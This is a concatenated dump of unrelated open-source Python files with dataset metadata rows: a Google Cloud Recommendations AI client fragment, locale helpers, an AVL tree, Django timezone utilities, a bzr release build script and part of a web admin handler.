request = prediction_apikey_registry_service.ListPredictionApiKeyRegistrationsRequest(
request
)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.list_prediction_api_key_registrations
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListPredictionApiKeyRegistrationsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def delete_prediction_api_key_registration(
self,
request: prediction_apikey_registry_service.DeletePredictionApiKeyRegistrationRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Unregister an apiKey from using for predict method.
Args:
request (google.cloud.recommendationengine_v1beta1.types.DeletePredictionApiKeyRegistrationRequest):
The request object. Request message for
`DeletePredictionApiKeyRegistration` method.
name (str):
Required. The API key to unregister including full
resource path.
``projects/*/locations/global/catalogs/default_catalog/eventStores/default_event_store/predictionApiKeyRegistrations/<YOUR_API_KEY>``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a prediction_apikey_registry_service.DeletePredictionApiKeyRegistrationRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request,
prediction_apikey_registry_service.DeletePredictionApiKeyRegistrationRequest,
):
request = prediction_apikey_registry_service.DeletePredictionApiKeyRegistrationRequest(
request
)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.delete_prediction_api_key_registration
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-recommendations-ai",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("PredictionApiKeyRegistryClient",)
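# --- Illustrative usage sketch (not part of the generated client) ----------
# Assumes valid application-default credentials and an existing event store;
# the project/catalog IDs and the key value below are placeholders, and the
# ``api_key`` field name is assumed from the service's request messages.
def _example_register_and_list_api_keys():
    client = PredictionApiKeyRegistryClient()
    parent = client.event_store_path(
        "my-project", "global", "default_catalog", "default_event_store"
    )
    registration = prediction_apikey_registry_service.PredictionApiKeyRegistration(
        api_key="my-api-key",
    )
    created = client.create_prediction_api_key_registration(
        parent=parent, prediction_api_key_registration=registration,
    )
    # The list call returns a pager that resolves additional pages lazily.
    for item in client.list_prediction_api_key_registrations(parent=parent):
        print(item)
    return created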
| apache-2.0 | 4,932,179,393,963,767,000 | 42.486943 | 201 | 0.63165 | false | 4.619778 | false | false | false |
MediaKraken/MediaKraken_Deployment | source/common/common_internationalization.py | 1 | 1325 | """
Copyright (C) 2017 Quinn D Granfor <spootdev@gmail.com>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2, as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License version 2 for more details.
You should have received a copy of the GNU General Public License
version 2 along with this program; if not, write to the Free
Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
"""
import pycountry
from babel.dates import format_date
from babel.numbers import format_decimal
def com_inter_date_format(date_to_format, country_code='en_US'):
return format_date(date_to_format, locale=country_code)
def com_inter_number_format(number_to_format, country_code='en_US'):
return format_decimal(number_to_format, locale=country_code)
def com_inter_country_name(country_code='eng'):
try:
lang = pycountry.languages.get(alpha_3=country_code)
except KeyError:
return country_code
if lang is None:
return country_code
return lang.name
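# Minimal demo of the helpers above; assumes babel and pycountry are
# installed, and the sample values are arbitrary.
if __name__ == '__main__':
    import datetime
    print(com_inter_date_format(datetime.date(2017, 1, 31)))
    print(com_inter_date_format(datetime.date(2017, 1, 31), 'de_DE'))
    print(com_inter_number_format(1234567.89))
    print(com_inter_country_name('fra'))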
| gpl-3.0 | -7,388,436,541,744,186,000 | 32.974359 | 69 | 0.743396 | false | 3.955224 | false | false | false |
AbhiAgarwal/prep | python/avl_rotation.py | 1 | 12791 | class AVLNode(object):
def __init__(self, key):
self.key=key
self.right_child=None
self.left_child=None
self.parent=None
self.height=0
self.balance=0
def update_height(self, upwards=True):
#If upwards we go up the tree correcting heights and balances,
#if not we just correct the given node.
if self.left_child is None:
#Empty left tree.
left_height = 0
else:
left_height = self.left_child.height+1
if self.right_child is None:
#Empty right tree.
right_height = 0
else:
right_height = self.right_child.height+1
#Note that the balance can change even when the height does not,
#so change it before checking to see if height needs updating.
self.balance = left_height-right_height
height = max(left_height, right_height)
if self.height != height:
self.height = height
if self.parent is not None:
#We only need to go up a level if the height changes.
if upwards:
self.parent.update_height()
def is_left(self):
#Handy to find out whether a node is a left or right child or neither.
if self.parent is None:
return self.parent
else:
return self is self.parent.left_child
class AVLTree(object):
def __init__(self):
self.root =None
def insert(self, key, node=None):
#The first call is slightly different.
if node is None:
#First call, start node at root.
node = self.root
if node is None:
#Empty tree, create root.
node = AVLNode(key=key)
self.root=node
return node
else:
ret= self.insert(key=key, node=node)
self.balance(ret)
return ret
#Not a first call.
if node.key ==key:
#No need to insert, key already present.
return node
elif node.key >key:
child = node.left_child
if child is None:
#Reached the bottom, insert node and update heights.
child = AVLNode(key=key)
child.parent=node
node.left_child = child
node.update_height()
return child
else:
return self.insert(key=key, node=child)
elif node.key < key:
child = node.right_child
if child is None:
#Reached the bottom, insert node and update heights.
child = AVLNode(key=key)
child.parent=node
node.right_child = child
return child
else:
return self.insert(key=key, node=child)
else:
print "This shouldn't happen."
def find(self, key, node=None):
if node is None:
#First call.
node=self.root
if self.root is None:
return None
else:
return self.find(key, self.root)
#Now we handle nonfirst calls.
elif node.key == key:
#Found the node.
return node
elif key < node.key:
if node.left_child is None:
#If key not in tree, we return a node that would be its parent.
return node
else:
return self.find(key,node.left_child)
else:
if node.right_child is None:
return node
else:
return self.find(key, node.right_child)
def delete(self, key, node=None):
#Delete key from tree.
if node is None:
#Initial call.
node = self.find(key)
if (node is None) or (node.key != key):
#Empty tree or key not in tree.
return
if (node.left_child is None) and (node.right_child is not None):
#Has one right child.
right_child = node.right_child
left = node.is_left()
if left is not None:
parent=node.parent
if not left:
parent.right_child=right_child
else:
parent.left_child=right_child
right_child.parent =parent
self.balance(parent)
else:
right_child.parent=None
self.root = right_child
#No need to update heights or rebalance.
elif (node.left_child is not None) and (node.right_child is None):
#Has one left child.
left_child = node.left_child
left= node.is_left()
if left is not None:
parent=node.parent
if left:
parent.left_child=left_child
else:
                parent.right_child=left_child
left_child.parent =parent
self.balance(parent)
else:
left_child.parent=None
self.root=left_child
elif node.left_child is None:
#Has no children.
parent = node.parent
if parent is None:
#Deleting a lone root, set tree to empty.
self.root = None
else:
if parent.left_child is node:
parent.left_child =None
else:
parent.right_child=None
self.balance(parent)
else:
#Node has two childen, swap keys with successor node
#and delete successor node.
right_most_child = self.find_leftmost(node.right_child)
node.key = right_most_child.key
self.delete(key=node.key,node=right_most_child)
#Note that updating the heights will be handled in the next
#call of delete.
def find_rightmost(self, node):
if node.right_child is None:
return node
else:
return self.find_rightmost(node.right_child)
def find_leftmost(self, node):
if node.left_child is None:
return node
else:
return self.find_leftmost(node.left_child)
def find_next(self, key):
node = self.find(key)
if (node is None) or (node.key != key):
#Key not in tree.
return None
else:
right_child = node.right_child
if right_child is not None:
node= self.find_leftmost(right_child)
else:
parent = node.parent
while(parent is not None):
if node is parent.left_child:
break
node = parent
parent = node.parent
node=parent
if node is None:
#Key is largest in tree.
return node
else:
return node.key
def find_prev(self, key):
node = self.find(key)
if (node is None) or (node.key != key):
#Key not in tree.
return None
else:
left_child = node.left_child
if left_child is not None:
node= self.find_rightmost(left_child)
else:
parent = node.parent
while(parent is not None):
if node is parent.right_child:
break
node = parent
parent = node.parent
node=parent
if node is None:
                #Key is smallest in tree.
return node
else:
return node.key
def balance(self, node):
node.update_height(False)
if node.balance == 2:
if node.left_child.balance != -1:
#Left-left case.
self.right_rotation(node)
if node.parent.parent is not None:
#Move up a level.
self.balance(node.parent.parent)
else:
#Left-right case.
self.left_rotation(node.left_child)
self.balance(node)
elif node.balance ==-2:
if node.right_child.balance != 1:
#Right-right case.
self.left_rotation(node)
if node.parent.parent is not None:
self.balance(node.parent.parent)
else:
#Right-left case.
self.right_rotation(node.right_child)
self.balance(node)
else:
if node.parent is not None:
self.balance(node.parent)
#I also include a new plotting routine to show the balances or keys of the node.
def plot(self, balance=False):
#Builds a copy of the BST in igraphs for plotting.
#Since exporting the adjacency lists loses information about
#left and right children, we build it using a queue.
import igraph as igraphs
G = igraphs.Graph()
if self.root is not None:
G.add_vertices(1)
queue = [[self.root,0]]
#Queue has a pointer to the node in our BST, and its index
#in the igraphs copy.
index=0
not_break=True
while(not_break):
#At each iteration, we label the head of the queue with its key,
#then add any children into the igraphs graph,
#and into the queue.
node=queue[0][0] #Select front of queue.
node_index = queue[0][1]
if not balance:
G.vs[node_index]['label']=node.key
else:
G.vs[node_index]['label']=node.balance
if index ==0:
#Label root green.
G.vs[node_index]['color']='green'
if node.left_child is not None:
G.add_vertices(1)
G.add_edges([(node_index, index+1)])
queue.append([node.left_child,index+1])
G.vs[index+1]['color']='red' #Left children are red.
index+=1
if node.right_child is not None:
G.add_vertices(1)
G.add_edges([(node_index, index+1)])
G.vs[index+1]['color']='blue'
queue.append([node.right_child, index+1])
index += 1
queue.pop(0)
if len(queue)==0:
not_break=False
layout = G.layout_reingold_tilford(root=0)
igraphs.plot(G, layout=layout)
def right_rotation(self, root):
left=root.is_left()
pivot = root.left_child
if pivot is None:
return
root.left_child = pivot.right_child
if pivot.right_child is not None:
root.left_child.parent = root
pivot.right_child = root
pivot.parent = root.parent
root.parent=pivot
if left is None:
self.root = pivot
elif left:
pivot.parent.left_child=pivot
else:
pivot.parent.right_child=pivot
root.update_height(False)
pivot.update_height(False)
def left_rotation(self, root):
left=root.is_left()
pivot = root.right_child
if pivot is None:
return
root.right_child = pivot.left_child
if pivot.left_child is not None:
root.right_child.parent = root
pivot.left_child = root
pivot.parent = root.parent
root.parent=pivot
if left is None:
self.root = pivot
elif left:
pivot.parent.left_child=pivot
else:
pivot.parent.right_child=pivot
root.update_height(False)
pivot.update_height(False)
def sort(lst, ascending=True):
A = AVLTree()
for item in lst:
A.insert(item)
    ret=[]
    if A.root is None:
        #Empty input list, nothing to traverse.
        return ret
if ascending:
node=A.find_leftmost(A.root)
if node is not None:
key = node.key
else:
key=node
while (key is not None):
ret.append(key)
key=A.find_next(key)
else:
node=A.find_rightmost(A.root)
if node is not None:
key = node.key
else:
key=node
while (key is not None):
ret.append(key)
key=A.find_prev(key)
return ret
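#Small demonstration of sort() on an arbitrary example list.
def demo_sort():
    lst = [5, 3, 8, 1, 4]
    print "ascending: ", sort(lst)
    print "descending:", sort(lst, ascending=False)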
def test_rotation():
lst= [1,4,2,5,1,3,7,11,4.5]
print "List is ",lst
B = AVLTree()
for item in lst:
print "inserting", item
B.insert(item)
node=B.find(4)
B.left_rotation(node)
B.plot(True)
B.right_rotation(node.parent)
test_rotation() | mit | 4,788,308,656,106,740,000 | 32.574803 | 80 | 0.506215 | false | 4.273638 | false | false | false |
knowsis/django | django/utils/timezone.py | 90 | 9180 | """
Timezone-related classes and functions.
This module uses pytz when it's available and fallbacks when it isn't.
"""
from datetime import datetime, timedelta, tzinfo
from threading import local
import sys
import time as _time
try:
import pytz
except ImportError:
pytz = None
from django.conf import settings
from django.utils import six
__all__ = [
'utc',
'get_default_timezone', 'get_default_timezone_name',
'get_current_timezone', 'get_current_timezone_name',
'activate', 'deactivate', 'override',
'localtime', 'now',
'is_aware', 'is_naive', 'make_aware', 'make_naive',
]
# UTC and local time zones
ZERO = timedelta(0)
class UTC(tzinfo):
"""
UTC implementation taken from Python's docs.
Used only when pytz isn't available.
"""
def __repr__(self):
return "<UTC>"
def utcoffset(self, dt):
return ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return ZERO
class ReferenceLocalTimezone(tzinfo):
"""
Local time implementation taken from Python's docs.
Used only when pytz isn't available, and most likely inaccurate. If you're
having trouble with this class, don't waste your time, just install pytz.
Kept identical to the reference version. Subclasses contain improvements.
"""
def __init__(self):
# This code is moved in __init__ to execute it as late as possible
# See get_default_timezone().
self.STDOFFSET = timedelta(seconds=-_time.timezone)
if _time.daylight:
self.DSTOFFSET = timedelta(seconds=-_time.altzone)
else:
self.DSTOFFSET = self.STDOFFSET
self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET
tzinfo.__init__(self)
def __repr__(self):
return "<LocalTimezone>"
def utcoffset(self, dt):
if self._isdst(dt):
return self.DSTOFFSET
else:
return self.STDOFFSET
def dst(self, dt):
if self._isdst(dt):
return self.DSTDIFF
else:
return ZERO
def tzname(self, dt):
is_dst = False if dt is None else self._isdst(dt)
return _time.tzname[is_dst]
def _isdst(self, dt):
tt = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
dt.weekday(), 0, 0)
stamp = _time.mktime(tt)
tt = _time.localtime(stamp)
return tt.tm_isdst > 0
class LocalTimezone(ReferenceLocalTimezone):
"""
Slightly improved local time implementation focusing on correctness.
It still crashes on dates before 1970 or after 2038, but at least the
error message is helpful.
"""
def _isdst(self, dt):
try:
return super(LocalTimezone, self)._isdst(dt)
except (OverflowError, ValueError) as exc:
exc_type = type(exc)
exc_value = exc_type(
"Unsupported value: %r. You should install pytz." % dt)
exc_value.__cause__ = exc
six.reraise(exc_type, exc_value, sys.exc_info()[2])
utc = pytz.utc if pytz else UTC()
"""UTC time zone as a tzinfo instance."""
# In order to avoid accessing the settings at compile time,
# wrap the expression in a function and cache the result.
_localtime = None
def get_default_timezone():
"""
Returns the default time zone as a tzinfo instance.
This is the time zone defined by settings.TIME_ZONE.
See also :func:`get_current_timezone`.
"""
global _localtime
if _localtime is None:
if isinstance(settings.TIME_ZONE, six.string_types) and pytz is not None:
_localtime = pytz.timezone(settings.TIME_ZONE)
else:
# This relies on os.environ['TZ'] being set to settings.TIME_ZONE.
_localtime = LocalTimezone()
return _localtime
# This function exists for consistency with get_current_timezone_name
def get_default_timezone_name():
"""
Returns the name of the default time zone.
"""
return _get_timezone_name(get_default_timezone())
_active = local()
def get_current_timezone():
"""
Returns the currently active time zone as a tzinfo instance.
"""
return getattr(_active, "value", get_default_timezone())
def get_current_timezone_name():
"""
Returns the name of the currently active time zone.
"""
return _get_timezone_name(get_current_timezone())
def _get_timezone_name(timezone):
"""
Returns the name of ``timezone``.
"""
try:
# for pytz timezones
return timezone.zone
except AttributeError:
# for regular tzinfo objects
return timezone.tzname(None)
# Timezone selection functions.
# These functions don't change os.environ['TZ'] and call time.tzset()
# because it isn't thread safe.
def activate(timezone):
"""
Sets the time zone for the current thread.
The ``timezone`` argument must be an instance of a tzinfo subclass or a
time zone name. If it is a time zone name, pytz is required.
"""
if isinstance(timezone, tzinfo):
_active.value = timezone
elif isinstance(timezone, six.string_types) and pytz is not None:
_active.value = pytz.timezone(timezone)
else:
raise ValueError("Invalid timezone: %r" % timezone)
def deactivate():
"""
Unsets the time zone for the current thread.
Django will then use the time zone defined by settings.TIME_ZONE.
"""
if hasattr(_active, "value"):
del _active.value
class override(object):
"""
Temporarily set the time zone for the current thread.
This is a context manager that uses ``~django.utils.timezone.activate()``
to set the timezone on entry, and restores the previously active timezone
on exit.
The ``timezone`` argument must be an instance of a ``tzinfo`` subclass, a
    time zone name, or ``None``. If it is a time zone name, pytz is required.
If it is ``None``, Django enables the default time zone.
"""
def __init__(self, timezone):
self.timezone = timezone
self.old_timezone = getattr(_active, 'value', None)
def __enter__(self):
if self.timezone is None:
deactivate()
else:
activate(self.timezone)
def __exit__(self, exc_type, exc_value, traceback):
if self.old_timezone is None:
deactivate()
else:
_active.value = self.old_timezone
# Templates
def template_localtime(value, use_tz=None):
"""
Checks if value is a datetime and converts it to local time if necessary.
If use_tz is provided and is not None, that will force the value to
be converted (or not), overriding the value of settings.USE_TZ.
This function is designed for use by the template engine.
"""
should_convert = (isinstance(value, datetime)
and (settings.USE_TZ if use_tz is None else use_tz)
and not is_naive(value)
and getattr(value, 'convert_to_local_time', True))
return localtime(value) if should_convert else value
# Utilities
def localtime(value, timezone=None):
"""
Converts an aware datetime.datetime to local time.
Local time is defined by the current time zone, unless another time zone
is specified.
"""
if timezone is None:
timezone = get_current_timezone()
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# available for pytz time zones
value = timezone.normalize(value)
return value
def now():
"""
Returns an aware or naive datetime.datetime, depending on settings.USE_TZ.
"""
if settings.USE_TZ:
# timeit shows that datetime.now(tz=utc) is 24% slower
return datetime.utcnow().replace(tzinfo=utc)
else:
return datetime.now()
# By design, these four functions don't perform any checks on their arguments.
# The caller should ensure that they don't receive an invalid value like None.
def is_aware(value):
"""
Determines if a given datetime.datetime is aware.
The logic is described in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
"""
return value.tzinfo is not None and value.tzinfo.utcoffset(value) is not None
def is_naive(value):
"""
Determines if a given datetime.datetime is naive.
The logic is described in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
"""
return value.tzinfo is None or value.tzinfo.utcoffset(value) is None
def make_aware(value, timezone):
"""
Makes a naive datetime.datetime in a given time zone aware.
"""
if hasattr(timezone, 'localize'):
# available for pytz time zones
return timezone.localize(value, is_dst=None)
else:
# may be wrong around DST changes
return value.replace(tzinfo=timezone)
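# Illustrative round trip with make_aware() above and make_naive() below
# (the datetime value is arbitrary):
#
#   naive = datetime(2011, 9, 1, 13, 20, 30)
#   aware = make_aware(naive, utc)
#   assert is_aware(aware) and is_naive(make_naive(aware, utc))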
def make_naive(value, timezone):
"""
Makes an aware datetime.datetime naive in a given time zone.
"""
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# available for pytz time zones
value = timezone.normalize(value)
return value.replace(tzinfo=None)
| bsd-3-clause | -2,760,937,381,903,464,000 | 27.958991 | 81 | 0.644444 | false | 4.05477 | false | false | false |
Distrotech/bzr | tools/win32/build_release.py | 2 | 6135 | #!/cygdrive/C/Python25/python
"""A script to help automate the build process."""
# When preparing a new release, make sure to set all of these to the latest
# values.
VERSIONS = {
'bzr': '1.17',
'qbzr': '0.12',
'bzrtools': '1.17.0',
'bzr-svn': '0.6.3',
'bzr-rewrite': '0.5.2',
'subvertpy': '0.6.8',
}
# This will be passed to 'make' to ensure we build with the right python
PYTHON='/cygdrive/c/Python25/python'
# Create the final build in this directory
TARGET_ROOT='release'
DEBUG_SUBPROCESS = True
import os
import shutil
import subprocess
import sys
BZR_EXE = None
def bzr():
global BZR_EXE
if BZR_EXE is not None:
return BZR_EXE
try:
subprocess.call(['bzr', '--version'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
BZR_EXE = 'bzr'
except OSError:
try:
subprocess.call(['bzr.bat', '--version'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
BZR_EXE = 'bzr.bat'
except OSError:
raise RuntimeError('Could not find bzr or bzr.bat on your path.')
return BZR_EXE
def call_or_fail(*args, **kwargs):
"""Call a subprocess, and fail if the return code is not 0."""
if DEBUG_SUBPROCESS:
print ' calling: "%s"' % (' '.join(args[0]),)
p = subprocess.Popen(*args, **kwargs)
(out, err) = p.communicate()
if p.returncode != 0:
raise RuntimeError('Failed to run: %s, %s' % (args, kwargs))
return out
TARGET = None
def get_target():
global TARGET
if TARGET is not None:
return TARGET
out = call_or_fail([sys.executable, get_bzr_dir() + '/bzr',
'version', '--short'], stdout=subprocess.PIPE)
version = out.strip()
TARGET = os.path.abspath(TARGET_ROOT + '-' + version)
return TARGET
def clean_target():
"""Nuke the target directory so we know we are starting from scratch."""
target = get_target()
if os.path.isdir(target):
print "Deleting: %s" % (target,)
shutil.rmtree(target)
def get_bzr_dir():
return 'bzr.' + VERSIONS['bzr']
def update_bzr():
"""Make sure we have the latest bzr in play."""
bzr_dir = get_bzr_dir()
if not os.path.isdir(bzr_dir):
bzr_version = VERSIONS['bzr']
bzr_url = 'lp:bzr/' + bzr_version
print "Getting bzr release %s from %s" % (bzr_version, bzr_url)
call_or_fail([bzr(), 'co', bzr_url, bzr_dir])
else:
print "Ensuring %s is up-to-date" % (bzr_dir,)
call_or_fail([bzr(), 'update', bzr_dir])
def create_target():
target = get_target()
print "Creating target dir: %s" % (target,)
call_or_fail([bzr(), 'co', get_bzr_dir(), target])
def get_plugin_trunk_dir(plugin_name):
return '%s/trunk' % (plugin_name,)
def get_plugin_release_dir(plugin_name):
return '%s/%s' % (plugin_name, VERSIONS[plugin_name])
def get_plugin_trunk_branch(plugin_name):
return 'lp:%s' % (plugin_name,)
def update_plugin_trunk(plugin_name):
trunk_dir = get_plugin_trunk_dir(plugin_name)
if not os.path.isdir(trunk_dir):
plugin_trunk = get_plugin_trunk_branch(plugin_name)
print "Getting latest %s trunk" % (plugin_name,)
call_or_fail([bzr(), 'co', plugin_trunk,
trunk_dir])
else:
print "Ensuring %s is up-to-date" % (trunk_dir,)
call_or_fail([bzr(), 'update', trunk_dir])
return trunk_dir
def _plugin_tag_name(plugin_name):
if plugin_name in ('bzr-svn', 'bzr-rewrite', 'subvertpy'):
return '%s-%s' % (plugin_name, VERSIONS[plugin_name])
# bzrtools and qbzr use 'release-X.Y.Z'
return 'release-' + VERSIONS[plugin_name]
def update_plugin(plugin_name):
release_dir = get_plugin_release_dir(plugin_name)
if not os.path.isdir(plugin_name):
if plugin_name in ('bzr-svn', 'bzr-rewrite'):
# bzr-svn uses a different repo format
call_or_fail([bzr(), 'init-repo', '--rich-root-pack', plugin_name])
else:
os.mkdir(plugin_name)
if os.path.isdir(release_dir):
print "Removing existing dir: %s" % (release_dir,)
shutil.rmtree(release_dir)
# First update trunk
trunk_dir = update_plugin_trunk(plugin_name)
# Now create the tagged directory
tag_name = _plugin_tag_name(plugin_name)
print "Creating the branch %s" % (release_dir,)
call_or_fail([bzr(), 'co', '-rtag:%s' % (tag_name,),
trunk_dir, release_dir])
return release_dir
def install_plugin(plugin_name):
release_dir = update_plugin(plugin_name)
# at least bzrtools doesn't like you to call 'setup.py' unless you are in
# that directory specifically, so we cd, rather than calling it from
# outside
print "Installing %s" % (release_dir,)
call_or_fail([sys.executable, 'setup.py', 'install', '-O1',
'--install-lib=%s' % (get_target(),)],
cwd=release_dir)
def update_tbzr():
tbzr_loc = os.environ.get('TBZR', None)
if tbzr_loc is None:
raise ValueError('You must set TBZR to the location of tortoisebzr.')
print 'Updating %s' % (tbzr_loc,)
call_or_fail([bzr(), 'update', tbzr_loc])
def build_installer():
target = get_target()
print
print
print '*' * 60
print 'Building standalone installer'
call_or_fail(['make', 'PYTHON=%s' % (PYTHON,), 'installer'],
cwd=target)
def main(args):
import optparse
p = optparse.OptionParser(usage='%prog [OPTIONS]')
opts, args = p.parse_args(args)
update_bzr()
update_tbzr()
clean_target()
create_target()
install_plugin('subvertpy')
install_plugin('bzrtools')
install_plugin('qbzr')
install_plugin('bzr-svn')
install_plugin('bzr-rewrite')
build_installer()
if __name__ == '__main__':
main(sys.argv[1:])
# vim: ts=4 sw=4 sts=4 et ai
| gpl-2.0 | 5,361,686,361,667,223,000 | 27.781553 | 79 | 0.579136 | false | 3.336052 | false | false | false |
unclechu/avto-lux161 | avto-lux/app/adm/routes/actions.py | 1 | 14649 | # -*- coding: utf-8 -*-
import json
from warnings import warn
from tornado.web import RedirectHandler, URLSpec
from .helpers import query_except_handler, require_auth
from app.mixins.routes import JsonResponseMixin
from app.models.dbconnect import Session, db_inspector
from app.models.usermodels import User
from app.models.pagemodels import StaticPageModel, UrlMapping
from app.models.non_relation_data import NonRelationData
from app.models.catalogmodels import CatalogSectionModel, CatalogItemModel
class AdminMainHandler(JsonResponseMixin):
@require_auth
def post(self):
action = self.get_argument('action')
		kwargs = {}
		try:
			kwargs = json.loads(self.get_argument('args'))
		except Exception:
			kwargs = {}
actions = {
'get_pages_list': self.get_pages_list,
'get_catalog_sections': self.get_catalog_sections,
'get_catalog_elements': self.get_catalog_elements,
'get_redirect_list': self.get_redirect_list,
'get_accounts_list': self.get_accounts_list,
'get_data_list': self.get_data_list,
'get_fields': self.get_fields,
'add': self.create, # for add new element/section forms
'update': self.update, # for editing elements/sections forms
'delete': self.delete, # for deleting elements/sections
'reorder': self.reorder # custom reordering
}
if action not in actions.keys():
return self.json_response({
'status': 'error',
'error_code': 'non_existent_action'
})
func = actions[action]
		return func(**kwargs)
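	# The admin front-end is expected to POST two form fields: 'action'
	# (one of the keys above) and 'args' (a JSON object of keyword
	# arguments). For example -- the values here are illustrative --
	# action=get_catalog_elements with args={"id": 3} ends up calling
	# get_catalog_elements(id=3).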
@query_except_handler
def get_pages_list(self):
session = Session()
try:
result = session.execute(
StaticPageModel.get_ordered_list_query().done()
)
data = session.query(StaticPageModel).instances(result)
except Exception as e:
warn(
'adm/AdminMainHandler.get_pages_list(): '+
'cannot get static pages:\n%s' % e
)
raise e
finally:
session.close()
pages_list = [x.static_list for x in data]
for idx, page in enumerate(pages_list):
page['sort'] = idx + 1
return self.json_response({
'status': 'success',
'data_list': pages_list
})
	## TODO : Optimize by using a join ¯\(°_o)/¯
@query_except_handler
def get_catalog_sections(self):
session = Session()
try:
cats = session.query(CatalogSectionModel.id).all()
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.get_catalog_sections(): ' +
'cannot get catalog sections:\n%s' % e
)
raise e
counts = []
for i in cats:
try:
count = (
session
.query(CatalogItemModel.id)
.filter_by(section_id=i[0])
.all()
)
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.get_catalog_sections(): ' +
'cannot get catalog items by section id #%s:\n%s' %
(str(i[0]), e)
)
raise e
counts.append((len(count),))
try:
data = session.query(
CatalogSectionModel.title,
CatalogSectionModel.id,
CatalogSectionModel.is_active
).all()
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.get_catalog_sections(): ' +
'cannot get catalog sections:\n%s' % e
)
raise e
session.close()
return self.json_response({
'status': 'success',
'data_list': [
{
'is_active': bool(x[1][2]),
'id': x[1][1],
'title': x[1][0],
'count': x[0][0]
} for x in list(zip(counts, data))
]
})
@query_except_handler
def get_catalog_elements(self, id):
session = Session()
try:
data = session.query(
CatalogItemModel.id,
CatalogItemModel.title,
CatalogItemModel.is_active
).filter_by(section_id=id).all()
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.get_catalog_elements(): ' +
'cannot get catalog items by section id #%s:\n%s' %
(str(id), e)
)
raise e
try:
title = session.query(
CatalogSectionModel.title
).filter_by(id=id).one()
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.get_catalog_elements(): ' +
'cannot get catalog section by id #%s:\n%s' % (str(id), e)
)
raise e
session.close()
return self.json_response({
'status': 'success',
'section_title': title[0],
'data_list': [
{
'is_active': bool(x.is_active),
'title': x.title,
'id': x.id
} for x in data
]
})
@query_except_handler
def get_redirect_list(self):
session = Session()
try:
data = session.query(UrlMapping).all()
except Exception as e:
warn(
'adm/AdminMainHandler.get_redirect_list(): ' +
'cannot get data from UrlMapping model:\n%s' % e
)
raise e
finally:
session.close()
return self.json_response({
'status': 'success',
'data_list': [x.item for x in data]
})
@query_except_handler
def get_accounts_list(self):
session = Session()
try:
data = session.query(User).all()
except Exception as e:
warn(
'adm/AdminMainHandler.get_accounts_list(): ' +
'cannot get users:\n%s' % e
)
raise e
finally:
session.close()
return self.json_response({
'status': 'success',
'data_list': [
{
'id': x.id,
'login': x.login,
'is_active': x.is_active
} for x in data
]
})
@query_except_handler
def get_static_page(self, id):
session = Session()
try:
data = session.query(StaticPageModel).filter_by(id=id).one()
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.get_static_page(): ' +
'cannot get static page by id #%s:\n%s' % (str(id), e)
)
raise e
session.close()
return self.json_response({
'status': 'success',
'data': data.item
})
_section_model_map = {
'pages': StaticPageModel,
'redirect': UrlMapping,
'catalog_section': CatalogSectionModel,
'catalog_element': CatalogItemModel,
'data': NonRelationData
}
_section_model_map_with_accounts = _section_model_map.copy()
_section_model_map_with_accounts['accounts'] = User
# models that support custom ordering
_custom_ordering_models = [
StaticPageModel
]
_able_to_remove_elements_models = [
User
]
@query_except_handler
def create(self, section, **fields_data):
		# set as True flags that were checked;
		# only checked flags will be received from admin-panel front-end
fields_data.update({
key: True for key in fields_data.keys()
if key.startswith('is_') or key.startswith('has_')
})
session = Session()
Model = self._section_model_map[section]
if Model in self._custom_ordering_models:
fields_data['prev_elem'] = Model.extract_prev_elem(
session.query(Model).instances(
session.execute(
